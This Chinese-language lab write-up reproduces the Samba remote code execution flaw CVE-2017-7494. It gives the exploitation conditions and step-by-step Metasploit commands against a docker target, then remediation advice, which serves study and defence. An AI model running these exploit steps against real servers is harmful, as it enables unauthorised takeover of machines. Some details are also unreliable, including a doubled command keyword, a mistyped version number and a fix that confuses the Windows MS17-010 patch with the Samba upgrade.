linux Samba遠程代碼執行漏洞(CVE-2017-7494)復現


一、漏洞介紹

  Samba實現Windows主機與Linux服務器之間的資源共享,Linux操作系統提供了Samba服務,Samba服務為兩種不同的操作系統架起了一座橋梁,使Linux系統和Windows系統之間能夠實現互相通信。samba在linux系統上實現SMB協議的服務,使用SMB協議在局域網上共享文件和打印機.CVE-2017-7494,2017年5月24日Samba發布了4.6.4版本,修復嚴重的遠程代碼執行漏洞,該漏洞影響了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中間的所有版本,可以讓惡意訪問者遠程控制受影響的Linux和Unix機器。

二、主要影響版本

1、MS17-010方程式“永恆之藍”

WannaCry勒索蠕蟲,影響Windows xp 到Windows server 2012

2、CVE-2017-7494 Linux版本“永恆之藍”遠程代碼執行漏洞

Samba 3.5.0-4.6.4/4.5.1/4.4.14中間的所有版本

三、漏洞利用條件

1、部署了存在漏洞的samba版本,並且對外網開放445端口;

2、匿名訪問用戶對共享文件有可寫權限;(權限控制很重要)

3、需要知道共享目錄的物理路徑。

四、漏洞危害及常見攻擊方式

1、獲取服務器或個人pc的權限;

2、攻擊者常使用滲透測試工具metersploit中的exp進行攻擊。

五、漏洞復現

1、復現環境:

安裝了docker的Ubuntu服務器:192.168.4.128

攻擊機(kali):192.168.4.157

2.步驟:

開啟docker環境

sudo  docker-compose up -d

 

 sudo docker ps     //查看漏洞環境開啟情況

 

 msfconsole

use use exploit/linux/samba/is_known_pipename

show options

 

 set rhost 192.168.4.128

set SMB_FOLDER   /home/share

show options

 

這里出現了加密錯誤,需要通過不加密來進行exploit

 

 set SMB::AlwaysEncrypt false     //設置SMB總是不加密
set SMB::ProtocolVersion 1         //設置協議版本為Version 1

 

 exploit

六、漏洞修復建議

1、安裝ms17-010不定或升級samba版本到4.6.4

2、對外網關閉445端口

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM